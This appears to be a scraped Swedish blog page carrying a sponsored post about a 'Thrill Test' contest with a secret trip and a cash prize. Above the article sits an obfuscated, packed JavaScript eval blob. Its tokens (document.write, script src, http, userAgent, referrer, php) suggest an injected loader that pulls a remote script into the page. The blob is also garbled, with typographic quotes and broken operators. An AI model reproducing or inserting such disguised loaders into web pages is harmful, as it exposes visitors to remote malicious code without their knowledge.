Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

Sponsrad Video: The Thrill Test

type=”text/javascript”>
document.write(’’);

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tarns|var|u0026u|referrer|zhtts||js|php’.split(’|’),0,{}))
Thrill Test: Gillar du att ha spänning i livet? Men inte vet hur eller ifall du behöver mer? Nu har du chans att ta reda på detta. Genom ett enkelt test får du möjlighet att göra detta och även chans att vinna en av fyra exklusiva platser på ”The Thrillometer”. 

Om du skulle gå vidare som vinnare av The Thrillometer kommer du få ta del av ett riktigt ballt pris. Du kommer nämligen att bli flugen till en hemlig destination och anläggning där ni kommer att få utföra en rad spännande och även dem hemliga experiment.

Men det är inte allt. Som Europas mest spännande person har du också chans att vinna 1 000 pund ungefär 12 000 kronor. Kanske kan du bjuda med kompisarna på en vinstmiddag? Vem skulle inte vilja äta middag med Europas mest spännande person?

Kika in videon ovan för att se mer detaljer omkring tävlingen. Känns det rätt? Klickar du dig vidare på videon för att anmäla.

Stort lycka till!

Detta är ett sponsrat inlägg